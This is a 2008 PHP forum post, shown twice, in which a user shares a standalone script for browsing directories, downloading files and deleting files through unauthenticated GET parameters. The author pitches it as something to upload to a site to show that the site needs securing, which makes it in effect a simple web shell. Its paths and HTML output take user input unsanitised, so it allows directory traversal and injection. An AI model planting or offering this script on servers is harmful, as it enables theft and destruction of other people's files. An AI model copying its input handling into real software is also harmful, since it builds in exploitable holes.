TalkPHP - View Single Post

Village Idiot · 04-29-2008, 04:20 AM

A more recent creation of mine. This will let you browse directories, download files and delete files. Useful to prove to someone that their upload site needs securing. It is 100% standalone and works on linux and windows. It also works above and below the webroot, so long as you have the permissions.

PHP Code:


			
<?php
$extension = $_GET["e"];
$function = $_GET["f"];
$file = $_GET["fi"];


//handle the delete function
if($function == "delete")
{
    unlink(getcwd().$extension.$file);
    echo "Deleted<br />
    <a href=\"?e=$extension/\">return</a><br />";
}

if($function == "down")
{
    header("Content-Type: application/octet-stream");
    header("Content-Disposition: filename=$file");
    readfile(getcwd().$extension."/".$file);
    die();
    
}

?>
<h3>files</h3>
<?php

if ($handle = opendir(getcwd().$extension)) 
{
    while (false !== ($file = readdir($handle))) 
    {
        if ($file != "." && $file != "..") 
        {
            if(stristr($file,".") == true)
            {
                echo "<a href=\"?e=$extension/".$file."\">".$file."</a> - <a href=\"?e=$extension&f=delete&fi=$file\">Delete</a> - <a href=\"?e=$extension&f=down&fi=$file\">Download</a><br />\n";
            }
            else
            {
                $dir_array[] = "<a href=\"?e=$extension/"."$file\">$file</a><br />";
            }
        }
    }
    ?>
    <br /> <br />
    <h3>Directories</h3>
    <?php
    if(!is_array($dir_array))
    {
        echo "No Directories";
    }
    else
    {
        foreach($dir_array as $dir)
        {
            echo $dir;
        }
    }
    echo "<br /><br /><a href=\"?e=$extension/"."../\">Return</a><br />";
    echo "<br /><br /><a href=\"?e=\">Return to file location</a>";
    closedir($handle);
}

?>

04-29-2008, 04:20 AM	#2 (permalink)
Village Idiot Wizard Join Date: Sep 2007 Posts: 1,299 Thanks: 17	A more recent creation of mine. This will let you browse directories, download files and delete files. Useful to prove to someone that their upload site needs securing. It is 100% standalone and works on linux and windows. It also works above and below the webroot, so long as you have the permissions. PHP Code: <?php $extension = $_GET["e"]; $function = $_GET["f"]; $file = $_GET["fi"]; //handle the delete function if($function == "delete") { unlink(getcwd().$extension.$file); echo "Deleted<br /> <a href=\"?e=$extension/\">return</a><br />"; } if($function == "down") { header("Content-Type: application/octet-stream"); header("Content-Disposition: filename=$file"); readfile(getcwd().$extension."/".$file); die(); } ?> <h3>files</h3> <?php if ($handle = opendir(getcwd().$extension)) { while (false !== ($file = readdir($handle))) { if ($file != "." && $file != "..") { if(stristr($file,".") == true) { echo "<a href=\"?e=$extension/".$file."\">".$file."</a> - <a href=\"?e=$extension&f=delete&fi=$file\">Delete</a> - <a href=\"?e=$extension&f=down&fi=$file\">Download</a><br />\n"; } else { $dir_array[] = "<a href=\"?e=$extension/"."$file\">$file</a><br />"; } } } ?> <br /> <br /> <h3>Directories</h3> <?php if(!is_array($dir_array)) { echo "No Directories"; } else { foreach($dir_array as $dir) { echo $dir; } } echo "<br /><br /><a href=\"?e=$extension/"."../\">Return</a><br />"; echo "<br /><br /><a href=\"?e=\">Return to file location</a>"; closedir($handle); } ?> __________________